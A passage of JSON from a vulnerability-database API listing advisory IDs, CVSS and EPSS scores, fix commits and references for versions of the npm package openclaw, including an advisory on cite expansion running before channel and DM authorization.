                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35645",
                "GHSA-h4jx-hjr3-fhgc"
            ],
            "risk_score": 3.6,
            "exploitability": "0.5",
            "weighted_severity": "7.3",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cwd3-ecym-sfaw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90977?format=api",
            "vulnerability_id": "VCID-cyj6-zyuh-qug6",
            "summary": "OpenClaw: Tlon cite expansion happens before channel and DM authorization is complete\n## Summary\nTlon cite expansion happened before channel and DM authorization completed, allowing cite work and content handling before the final auth decision.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n- `ebee4e2210e1f282a982c7ef2ad79d77a572fc87`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now defers cite expansion until after authorization and preserves explicit empty-allowlist semantics.\n- extensions/tlon/src/monitor/utils.ts and extensions/tlon/src/security.test.ts ship the deferred cite expansion behavior and regressions.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35637",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1803",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17991",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18028",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35637"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ebee4e2210e1f282a982c7ef2ad79d77a572fc87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfg3-pqpq-93m4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35637"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:13:08Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-premature-cite-expansion-before-authorization-in-channel-and-dm"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vfg3-pqpq-93m4",
                    "reference_id": "GHSA-vfg3-pqpq-93m4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vfg3-pqpq-93m4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
